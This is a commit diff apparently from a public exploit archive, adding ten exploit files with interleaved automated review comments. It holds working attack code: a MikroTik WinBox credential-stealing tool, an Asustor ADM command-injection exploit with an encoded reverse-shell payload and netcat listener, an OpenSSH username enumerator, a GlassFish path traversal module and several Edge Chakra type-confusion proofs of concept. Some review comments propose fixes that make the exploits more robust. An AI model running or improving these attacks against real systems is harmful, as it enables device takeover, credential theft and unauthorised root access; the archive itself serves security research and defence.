DB: 2018-08-18
10 changes to exploits/shellcodes TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC) CEWE Photoshow 6.3.4 - Denial of Service (PoC) Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl Microsoft Edge Chakra JIT - Scope Parsing Type Confusion Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion OpenSSH 2.3 < 7.4 - Username Enumeration (PoC) Mikrotik WinBox 6.42 - Credential Disclosure (golang) Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit) Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection ADM 3.1.2RHG1 - Remote Code Execution
This commit is contained in:
parent
0424dfc05b
commit
16744756bc
11 changed files with 716 additions and 2 deletions
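--- a/exploits/hardware/webapps/45209.go
+++ b/exploits/hardware/webapps/45209.go
@@ -0,0 +1,234 @@
+/*
+
+# Title: Mikrotik WinBox 6.42 - Credential Disclosure ( golang edition )
+# Author: Maxim Yefimenko ( @slider )
+# Date: 2018-08-06
+# Sotware Link: https://mikrotik.com/download
+# Vendor Page: https://www.mikrotik.com/
+# Version: 6.29 - 6.42
+# Tested on: Fedora 28 \ Debian 9 \ Windows 10 \ Android ( wherever it was possible to compile.. it's golang ^_^ )
+# CVE: CVE-2018-14847
+# References:
+# ( Alireza Mosajjal ) https://github.com/mosajjal https://n0p.me/winbox-bug-dissection/
+# ( BasuCert ) https://github.com/BasuCert/WinboxPoC
+# ( manio ) https://github.com/manio/mtpass/blob/master/mtpass.cpp
+# and special thanks to Dmitriy_Area51
+
+*/
+
+package main
+
+import (
+"crypto/md5"
+"fmt"
+"net"
+"os"
+"strings"
+"time"
+)
+
+var (
+a = []byte{0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
+0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
+0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
+0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,
+0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,
+0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,
+0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,
+0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,
+0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,
+0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,
+0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
+0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
+0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
+0x00, 0x00}
+
+b = []byte{0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
+0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
+0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,
+0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
+0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
+0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
+0x00, 0x02, 0x00, 0x00, 0x00}
+
+buf = make([]byte, 1024*8)
+)
+
+func checkErr(err error) {
+if err != nil {
+fmt.Println("Error:" + err.Error())
+}
+}
+
+func decryptPassword(user []byte, passEnc []byte) string {
+var passw []byte
+hasher := md5.New()
+hasher.Write(user)
+hasher.Write([]byte("283i4jfkai3389"))
+key := hasher.Sum(nil)
+
+for i := 0; i < len(passEnc); i++ {
+passw = append(passw, passEnc[i]^key[i%len(key)])
+}
+
+return string(ASCIIonly(passw))
+}
+
+func ASCIIonly(s []byte) []byte {
+for i, c := range s {
+if c < 32 || c > 126 {
+return s[:i]
+}
+}
+return s
+}
+
+func extractPass(buff []byte) (s []string) {
+var (
+usr []byte
+pwd []byte
+)
+
+//searching for StartOfRecord
+for i := 0; i < len(buff); i++ {
+
+if i+2 >= len(buff) {
+break
+}
+
+if (buff[i] == 0x4d) && (buff[i+1] == 0x32) && (buff[i+2] == 0x0a || buff[i+2] == 0x10) {
+// fmt.Printf("Probably user record at offset 0x%.5x\n", i)
+
+//some bytes ahead is enable/disable flag
+i += int((buff[i+2] - 5))
+if i >= len(buff) {
+break
+}
+
+//searching for StartOfRecNumber
+if i+3 >= len(buff) {
+break
+}
+
+for !((buff[i] == 0x01) && ((buff[i+1] == 0x00) || (buff[i+1] == 0x20)) && (buff[i+3] == 0x09 || buff[i+3] == 0x20)) {
+i++
+if i+3 >= len(buff) {
+break
+}
+}
+
+i += 4
+if i >= len(buff) {
+break
+}
+// fmt.Printf("SORn: 0x%X\n", i)
+
+// comment?
+i += 18
+if (i + 4) >= len(buff) {
+break
+}
+if (!((buff[i+1] == 0x11) && (buff[i+2] == 0x20) && (buff[i+3] == 0x20) && (buff[i+4] == 0x21))) && (buff[i-5] == 0x03 && (buff[i] != 0x00)) {
+if (i+1)+int(buff[i]) >= len(buff) {
+break
+}
+i += int(buff[i])
+} else {
+i -= 18
+}
+
+//searching for StartOfPassword
+if i+4 >= len(buff) {
+break
+}
+
+for !((buff[i] == 0x11) && (buff[i+3] == 0x21) && ((buff[i+4] % byte(0x10)) == 0)) {
+i++
+if i+4 >= len(buff) {
+break
+}
+}
+i += 5
+if (i + 3) >= len(buff) {
+break
+}
+
+if (buff[i-1] != 0x00) && !((buff[i] == 0x01) && ((buff[i+1] == 0x20 && buff[i+2] == 0x20) || (buff[i+1] == 0x00 && buff[i+2] == 0x00)) && (buff[i+3] == 0x21)) {
+pwd = buf[i-1+1 : int(buf[i-1])+i-1+1]
+i += int(buff[i-1])
+}
+
+//searching for StartOfUsername
+if i+3 >= len(buff) {
+break
+}
+for !((buff[i] == 0x01) && (buff[i+3] == 0x21)) {
+i++
+if i+3 >= len(buff) {
+break
+}
+}
+
+i += 4
+if i >= len(buff) {
+break
+}
+if buff[i] != 0x00 {
+if i+int(buff[i]) >= len(buff) {
+break
+}
+
+usr = ASCIIonly(buff[i+1 : int(buff[i])+i+1])
+i += int(buff[i])
+}
+
+decrypted := decryptPassword(usr, pwd)
+//fmt.Printf(" --> %s\t%s\n", buff[i], decrypted)
+
+if len(usr) != 0 {
+s = append(s, strings.Join([]string{string(usr), string(decrypted)}, ":"))
+}
+
+}
+}
+
+return s
+}
+
+func main() {
+
+if len(os.Args) < 2 {
+fmt.Printf(" [ usage: %s 192.168.88.1\n\n", os.Args[0])
+os.Exit(0)
+}
+
+conn, err := net.DialTimeout("tcp", os.Args[1]+":8291", time.Duration(3*time.Second))
+
+if err != nil {
+fmt.Println(err.Error())
+return
+}
+
+defer conn.Close()
+
+conn.Write(a)
+reqLen, err := conn.Read(buf)
+checkErr(err)
+if reqLen < 38 {
+panic("First packet is too small")
+}
+
+b[19] = buf[38]
+
+conn.Write(b)
+reqLen, err = conn.Read(buf)
+checkErr(err)
+db := buf[:reqLen]
+
+s := extractPass(db)
+for i, acc := range s {
+data := strings.SplitN(acc, ":", 2)
+fmt.Printf(" [%d] %s\t%s\n", i, data[0], data[1])
+}
+}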
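Review bot: In extractPass, `pwd = buf[i-1+1 : int(buf[i-1])+i-1+1]` slices the package-level `buf` rather than the `buff` parameter, so the function only works because main passes a prefix of that same array, and the end offset `i+int(buff[i-1])` is never checked against len(buff) the way the username slice a few lines below checks `i+int(buff[i])`; suggest `if i+int(buff[i-1]) > len(buff) { break }` followed by `pwd = buff[i : i+int(buff[i-1])]`. In main, `if reqLen < 38` still admits a 38-byte reply, after which `b[19] = buf[38]` reads a byte that reply did not fill; the guard should be `if reqLen < 39`. Both `conn.Write` return values are discarded and checkErr only prints, so a failed second read leaves reqLen at 0 and the program silently prints nothing; returning on error there would make the failure visible. Indentation is not preserved in this rendering, so gofmt conformance could not be checked.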
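--- a/exploits/hardware/webapps/45212.py
+++ b/exploits/hardware/webapps/45212.py
@@ -0,0 +1,95 @@
+# Title: Asustor ADM 3.1.2RHG1 - Remote Code Execution
+# Author: Matthew Fulton & Kyle Lovett
+# Date: 2018-07-01
+# Vendor Homepage: https://www.asustor.com/
+# Software Link: http://download.asustor.com/download/adm/X64_G3_3.1.2.RHG1.img
+# Version: <= ADM 3.1.2RHG1
+# Tested on: ASUSTOR AS6202T
+# CVE : CVE-2018-11510
+# References:
+# http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
+
+#!/usr/bin/python
+
+"""
+CVE-2018-11510: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
+This exploit takes advantage an unauthenticated os command injection discovered by Kyle Lovette
+if exploitation occurs successfully, a root shell is granted
+Authors: matthew fulton and Kyle Lovett
+Date: 27 May 2018
+Background: Both Kyle and I found a number of vulnerabilities that we had independently reported
+to Asustor that Asustor hasn't acknowledge nor apparenlty fixed.
+After a twitter communication Kyle was kind enough to share a few details
+exploit created on MacOS system, python 2.7.10, may port to metasploit module soon
+Vendor link: https://www.asustor.com
+
+Matthews-MBP:remoteunauth matt$ python admex.py -t 192.168.1.82
+exploit for an unauthenticated OS command injection vulnerability that effects
+Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
+authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)
+starting netcat listener on port 1234
+/bin/sh: can't access tty; job control turned off
+/volume0/usr/builtin/webman/portal/apis # uname -a;id
+/bin/sh: can't access tty; job control turned off
+/volume0/usr/builtin/webman/portal/apis # Linux AS6202T-961F 4.4.24 #1 SMP Mon Mar 26 02:57:14 CST 2018 x86_64 GNU/Linux
+uid=0(root) gid=0(root) groups=0(root)
+"""
+
+import sys, threading, time, os, subprocess
+import urllib2
+import ssl
+import argparse
+
+
+class exploit(object):
+def __init__(self,interval=1):
+self.target = args.target
+self.rport = args.port
+self.lport = args.lport
+self.remote = args.remote
+self.interval = interval
+thread = threading.Thread(target=self.run, args=())
+thread.daemon = True
+thread.start()
+
+def run(self):
+#ignore ssl warnings
+ctx = ssl.create_default_context()
+ctx.check_hostname = False
+ctx.verify_mode = ssl.CERT_NONE
+while True:
+try:
+turl="https://"+self.target+":"+self.rport+"/portal/apis/aggrecate_js.cgi?script=" \
+"launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket" \
+"(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22"+self.remote+"%22%2C"+self.lport+"))" \
+"%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3D" \
+"subprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22"
+response=urllib2.urlopen(turl,context=ctx)
+time.sleep(self.interval)
+except urllib2.URLError as e:
+print "Something is wrong:|"
+print e
+os._exit(1)
+
+def revShell():
+print "starting netcat listener on port "+args.lport
+cmd = "nc -lv {0}".format(args.lport)
+os.system(cmd)
+
+def main():
+print """exploit for an unauthenticated OS command injection vulnerability that effects
+Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
+authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
+goexploit = exploit()
+revShell()
+
+if __name__ == '__main__':
+Help = """exploitation of a OS command injection bug that effects Asustor ADM, leads to complete compromise
+authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
+parser=argparse.ArgumentParser(description=help)
+parser.add_argument('--target', '-t', default="192.168.1.82", help="Target IP", required=True)
+parser.add_argument('--port', '-p', default="8001")
+parser.add_argument('--lport', '-l', default="1234")
+parser.add_argument('--remote','-r', default="192.168.1.253")
+args = parser.parse_args()
+main()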
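Review bot: `parser=argparse.ArgumentParser(description=help)` passes Python's builtin `help` object rather than the `Help` string assigned two lines earlier, so `-h` shows the builtin's repr as the description; the line should read `parser=argparse.ArgumentParser(description=Help)`. `--target` is declared with both `default=` and `required=True`, which makes the default unreachable. `run` loops forever re-sending the request every `interval` seconds while `revShell` blocks the main thread in `os.system`, and the `response` object is never read or closed; a comment stating that the retry loop is intentional, or a break after the first successful request, would make the control flow clear. The index entry added in this same commit records port 443 for this file while the script defaults `--port` to 8001, so one of the two is inconsistent. Indentation is not preserved in this rendering, so block structure could not be verified.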
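--- a/exploits/linux/remote/45210.py
+++ b/exploits/linux/remote/45210.py
@@ -0,0 +1,84 @@
+#!/usr/bin/env python
+
+# Copyright (c) 2018 Matthew Daley
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to
+# deal in the Software without restriction, including without limitation the
+# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
+# sell copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
+# IN THE SOFTWARE.
+
+
+import argparse
+import logging
+import paramiko
+import socket
+import sys
+
+
+class InvalidUsername(Exception):
+pass
+
+
+def add_boolean(*args, **kwargs):
+pass
+
+
+old_service_accept = paramiko.auth_handler.AuthHandler._handler_table[
+paramiko.common.MSG_SERVICE_ACCEPT]
+
+def service_accept(*args, **kwargs):
+paramiko.message.Message.add_boolean = add_boolean
+return old_service_accept(*args, **kwargs)
+
+
+def userauth_failure(*args, **kwargs):
+raise InvalidUsername()
+
+
+paramiko.auth_handler.AuthHandler._handler_table.update({
+paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
+paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
+})
+
+logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
+
+arg_parser = argparse.ArgumentParser()
+arg_parser.add_argument('hostname', type=str)
+arg_parser.add_argument('--port', type=int, default=22)
+arg_parser.add_argument('username', type=str)
+args = arg_parser.parse_args()
+
+sock = socket.socket()
+try:
+sock.connect((args.hostname, args.port))
+except socket.error:
+print '[-] Failed to connect'
+sys.exit(1)
+
+transport = paramiko.transport.Transport(sock)
+try:
+transport.start_client()
+except paramiko.ssh_exception.SSHException:
+print '[-] Failed to negotiate SSH transport'
+sys.exit(2)
+
+try:
+transport.auth_publickey(args.username, paramiko.RSAKey.generate(2048))
+except InvalidUsername:
+print '[*] Invalid username'
+sys.exit(3)
+except paramiko.ssh_exception.AuthenticationException:
+print '[+] Valid username'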
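Review bot: The final `try` catches only `InvalidUsername` and `AuthenticationException`, so any other `SSHException` or socket error from `transport.auth_publickey` escapes as a traceback, and if the server unexpectedly accepts the key the script ends silently with exit status 0, indistinguishable by exit code from the `[+] Valid username` path. Adding `else: print '[?] Authentication unexpectedly succeeded'` and `finally: transport.close()` would report that case and close the transport and socket that are otherwise never closed. The `_handler_table.update` at module import patches every `AuthHandler` in the process, not just this script's transport, which deserves a comment for anyone who imports this file as a module. The `print` statements are Python 2 syntax while the shebang selects whatever `python` resolves to; `#!/usr/bin/env python2` would pin it.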
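--- a/exploits/linux/webapps/45198.rb
+++ b/exploits/linux/webapps/45198.rb
@@ -0,0 +1,74 @@
+# Exploit title: Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)
+# Author: Dhiraj Mishra
+# Date: 2018-08-14
+# Software: Oracle Glassfish Server OSE
+# Version: 4.1
+# Software link: http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip
+# CVE: 2017-1000028
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+include Msf::Auxiliary::Report
+include Msf::Auxiliary::Scanner
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition',
+'Description' => %q{
+This module exploits an unauthenticated directory traversal vulnerability
+which exits in administration console of Oracle GlassFish Server 4.1, which is
+listening by default on port 4848/TCP.
+},
+'References' =>
+[
+['CVE', '2017-1000028'],
+['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],
+['EDB', '39441']
+],
+'Author' =>
+[
+'Trustwave SpiderLabs', # Vulnerability discovery
+'Dhiraj Mishra' # Metasploit module
+],
+'DisclosureDate' => 'Aug 08 2015',
+'License' => MSF_LICENSE
+))
+
+register_options(
+[
+Opt::RPORT(4848),
+OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
+OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
+])
+end
+
+def run_host(ip)
+filename = datastore['FILEPATH']
+traversal = "%c0%af.." * datastore['DEPTH'] << filename
+
+res = send_request_raw({
+'method' => 'GET',
+'uri' => "/theme/META-INF/prototype#{traversal}"
+})
+
+unless res && res.code == 200
+print_error('Nothing was downloaded')
+return
+end
+
+vprint_good("#{peer} - #{res.body}")
+path = store_loot(
+'oracle.traversal',
+'text/plain',
+ip,
+res.body,
+filename
+)
+print_good("File saved in: #{path}")
+end
+end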
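Review bot: `unless res && res.code == 200` is the only success test in run_host, so any 200 reply, including an empty body or an application error page, is stored as loot and announced with `print_good`; checking that `res.body` is non-empty before `store_loot`, e.g. `unless res && res.code == 200 && !res.body.to_s.empty?`, would cut the obvious false positive. The module is placed under `linux/webapps` while `FILEPATH` defaults to `/windows/win.ini`, so the default or the placement should be reconciled. The description text reads "which exits in administration console" where "exists" is meant. `"%c0%af.." * datastore['DEPTH'] << filename` appends in place to a freshly built string, which is correct, but `+ filename` reads more plainly.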
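--- a/exploits/windows/dos/45213.js
+++ b/exploits/windows/dos/45213.js
@@ -0,0 +1,31 @@
+/*
+If the Intl object hasn't been initialized, access to any property of it will trigger the initialization process which will run Intl.js. The problem is that it runs Intl.js without caring about the ImplicitCallFlags flag.
+
+In the PoC, it redefines Map.prototype.get to intercept the execution of Intl.js.
+
+PoC:
+*/
+
+function opt(arr, obj) {
+arr[0] = 1.1;
+obj.x;
+arr[0] = 2.3023e-320;
+}
+
+let arr = [1.1];
+for (let i = 0; i < 0x10000; i++) {
+opt(arr, {});
+}
+
+let get = Map.prototype.get;
+Map.prototype.get = function (key) {
+Map.prototype.get = get;
+
+arr[0] = {};
+
+return this.get(key);
+};
+
+opt(arr, Intl);
+
+alert(arr[0]);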
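Review bot: The file carries none of the header metadata the other additions in this commit use (`# Title`, `# Author`, `# Date`, `# Version`/`# Tested on`, `# CVE`); the leading comment only explains the bug. The same applies to 45214.js, 45215.js, 45216.js and 45217.js, of which only 45217.js names the tested Edge build. A header such as `// Title: Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl`, `// Author: Google Security Research`, `// Date: 2018-08-17`, taken from the index entry in this same commit, would make each file self-describing.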
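--- a/exploits/windows/dos/45214.js
+++ b/exploits/windows/dos/45214.js
@@ -0,0 +1,79 @@
+// PoC:
+
+async function trigger(a = class b {
+[await 1]() {
+}
+}) {
+}
+
+let spray = [];
+for (let i = 0; i < 100000; i++) {
+spray.push(parseFloat.bind(1, 0x1234, 0x1234, 0x1234, 0x1234));
+}
+
+trigger();
+
+/*
+The PoC is invalid JavaScript, but Chakra does parse it without any exception and generates incorrect bytecode from that.
+
+Here's the generated bytecode.
+
+Function trigger ( (#1.1), #2) (In0, In1) (size: 36 [34])
+18 locals (8 temps from R10), 5 inline cache
+Constant Table:
+======== =====
+R1 LdRoot
+R2 LdC_A_I4 int:1
+R3 Ld_A (undefined)
+R4 LdFalse
+
+Implicit Arg Ins:
+======== === ===
+R5 ArgIn_A In1
+
+0000 InitUndecl R6
+0002 TryCatch x:004c ( 71)
+
+
+Line 1: a = class b {
+Col 24: ^
+0005 BrSrNeq_A x:0048 ( 62) R5 R3
+000a NewScFunc R13 = b()
+000d InitClass R13
+0012 ProfiledLdFld R14 = R13.prototype #0 <0>
+0016 SetHomeObj R13 R14
+001b NewScObjectSimple R9
+001d ProfiledStFld R9.value = R2 #1 <1>
+0021 ProfiledStFld R9.done = R4 #2 <2>
+0025 Yield R9 R9 <<-----------------------------------------------
+0028 ResumeYield R15 R9
+002b NewScFunc R16 = b.prototype[]()
+002e SetComputedNameVar R16 R15
+0033 ProfiledLdFld R14 = R13.prototype #0 <0>
+0037 InitClassMemberComputedName R14[R15] = R16
+003d SetHomeObj R16 R14
+0042 InitConst R6 R13
+0045 Ld_A R5 R13
+0048 Leave
+0049 Br x:0074 ( 40)
+004c Catch R10
+004e Nop
+004f ProfiledLdRootFld R11 = root.Promise #4 <4>
+0055 ProfiledLdMethodFld R12 = R11.reject #3 <3>
+0059 StartCall ArgCount: 2
+005c ArgOut_A Out0 = R11
+005f ArgOut_A Out1 = R10
+0062 ProfiledCallIWithICIndex R12 = R12(ArgCount: 2) <3> <0>
+006c Ld_A R0 R12
+006f Leave
+0070 Br x:0076 ( 3)
+0073 Leave
+0074 LdUndef R0
+
+
+Line 5: }
+Col 1: ^
+0076 Ret
+
+Yield operations shoud not be performed under a try-catch block, but incorrectly generated bytecode allowed it at (a). This will lead to type confusion in the InterpreterStackFrame::OP_ResumeYield method.
+*/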
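--- a/exploits/windows/dos/45215.js
+++ b/exploits/windows/dos/45215.js
@@ -0,0 +1,38 @@
+/*
+Here's the method.
+template <typename TPropertyIndex>
+template <typename TPropertyIndexFrom>
+void DictionaryPropertyDescriptor<TPropertyIndex>::CopyFrom(DictionaryPropertyDescriptor<TPropertyIndexFrom>& descriptor)
+{
+this->Attributes = descriptor.Attributes;
+this->Data = (descriptor.Data == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Data;
+this->Getter = (descriptor.Getter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Getter;
+this->Setter = (descriptor.Setter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Setter;
+this->IsAccessor = descriptor.IsAccessor;
+
+#if ENABLE_FIXED_FIELDS
+this->IsInitialized = descriptor.IsInitialized;
+this->IsFixed = descriptor.IsFixed;
+this->UsedAsFixed = descriptor.UsedAsFixed;
+#endif
+}
+
+Given its name, I think that the method is supposed to copy all the fields from another descriptor to "this". But it actually leaves some fields uncopied. The "IsShadowed" field is one of them which indicates that a Let or Const variable has been declared in the global object with the same name as the name of a property of the global object. This lack of copying the "IsShadowed" field can lead to type confusion like in the PoC or uninitialized pointer dereference.
+
+PoC:
+*/
+
+let x = 1;
+
+this.x = 0x1234; // IsShadowed
+
+// Convert to BigDictionaryTypeHandler, CopyFrom will be used in the process.
+for (let i = 0; i < 0x10000; i++) {
+this['a' + i] = 1;
+}
+
+// Set IsAccessor
+this.__defineSetter__('x', () => {});
+
+// Type confusion
+this.x;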
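--- a/exploits/windows/dos/45216.js
+++ b/exploits/windows/dos/45216.js
@@ -0,0 +1,26 @@
+/*
+This is similar to issue 1531 . The patch seems to prevent type confusion triggered from StElemI_A instructions. But the SetItem method can also be invoked through the Array.prototype.push method which can be inlineed. We can achieve type confusion with the push method in the same way used for issue 1531 .
+
+PoC:
+*/
+
+function opt(arr, value) {
+arr.push(value); // <--------
+arr[0] = 2.3023e-320;
+}
+
+function main() {
+for (let i = 0; i < 0x10000; i++) {
+let tmp = [1.1, 2.2, 3.3];
+delete tmp[1];
+
+opt(tmp, 2.2);
+}
+
+let arr = [1.1];
+opt(arr, -5.3049894784e-314); // MAGIC VALUE!
+
+alert(arr);
+}
+
+main();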
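Review bot: The comment refers to "issue 1531" twice without naming the tracker it belongs to, so a reader of this file alone cannot locate the earlier report or the patch it mentions. Qualifying it with the tracker name or a link, as 45217.js does for its ChakraCore source references, would make the comparison verifiable.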
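--- a/exploits/windows/dos/45217.js
+++ b/exploits/windows/dos/45217.js
@@ -0,0 +1,18 @@
+/*
+The InitializeNumberFormat function in Intl.js is used to initialize an Intl.NumberFormat object, and InitializeDateTimeFormat is used for an Intl.DateTimeFormat object. There are two versions of each initializer. One is for WinGlob and the other is for ICU. The problem is that the versions for ICU don't check whether the given object has been initialized. This allows to initialize the same object multiple times which can lead to type confusion.
+
+It seems the recent version of Edge in Windows Insider Preview has started to use ICU. Tested on Microsoft Edge 42.17672.1000.0 and Microsoft EdgeHTML 17.17672.
+
+The initializer for ICU has no check:
+https://github.com/Microsoft/ChakraCore/blob/bc2e55a7d80338ee4c9c63b76893f6d816dfe70b/lib/Runtime/Library/InJavascript/Intl.js#L1151
+
+The initializer for WinGlob has a check:
+https://github.com/Microsoft/ChakraCore/blob/bc2e55a7d80338ee4c9c63b76893f6d816dfe70b/lib/Runtime/Library/InJavascript/Intl.js#L3046
+
+PoC:
+*/
+
+let object = {};
+Intl.NumberFormat.apply(object);
+Intl.DateTimeFormat.apply(object);
+Intl.DateTimeFormat.prototype.formatToParts.apply(object);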
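--- a/exploits/windows_x86-64/dos/45211.py
+++ b/exploits/windows_x86-64/dos/45211.py
@@ -0,0 +1,25 @@
+# Exploit Title: CEWE Photoshow 6.3.4 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-17
+# Homepage: https://cewe-photoworld.com/
+# Software Link: https://cewe-photoworld.com/creator-software/windows-download
+# Tested Version: 6.3.4
+# Tested on OS: Windows 10
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the program. Once inside of the CEWE Photoshow program click "Login". In the new window paste the content of
+# "exploit.txt" into the following fields:"email address" & "Password". Click "Ok" and you will see a crash.
+
+#!/usr/bin/python
+
+buffer = "A" * 4000
+
+payload = buffer
+try:
+f=open("exploit.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(payload)
+f.write(payload)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"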
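Review bot: The bare `except:` swallows every exception, including `KeyboardInterrupt`, and reports only "File cannot be created" without the reason, and `f` is never closed if `f.write` raises; `with open("exploit.txt","w") as f:` together with `except IOError as e: print "File cannot be created: %s" % e` handles both. The `#!/usr/bin/python` line sits after the header comments, so it is not an effective shebang and the file is not directly runnable despite its executable mode; the same applies to 45212.py in this commit. `buffer` shadows the Python 2 builtin of that name and is only aliased to `payload`; `payload = "A" * 4000` alone would do.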
@ -6046,9 +6046,15 @@ id,file,description,date,author,type,platform,port
45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware,
45191,exploits/windows_x86/dos/45191.py,"Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86,
45199,exploits/hardware/dos/45199.txt,"JioFi 4G M2S 1.0.2 - Denial of Service (PoC)",2018-08-15,"Vikas Chaudhary",dos,hardware,
45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,
45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,80
45204,exploits/windows_x86-64/dos/45204.py,"ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64,
45207,exploits/windows_x86-64/dos/45207.py,"Central Management Software 1.4.13 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64,
45211,exploits/windows_x86-64/dos/45211.py,"CEWE Photoshow 6.3.4 - Denial of Service (PoC)",2018-08-17,"Gionathan Reale",dos,windows_x86-64,
45213,exploits/windows/dos/45213.js,"Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl",2018-08-17,"Google Security Research",dos,windows,
45214,exploits/windows/dos/45214.js,"Microsoft Edge Chakra JIT - Scope Parsing Type Confusion",2018-08-17,"Google Security Research",dos,windows,
45215,exploits/windows/dos/45215.js,"Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
45216,exploits/windows/dos/45216.js,"Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
45217,exploits/windows/dos/45217.js,"Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion",2018-08-17,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
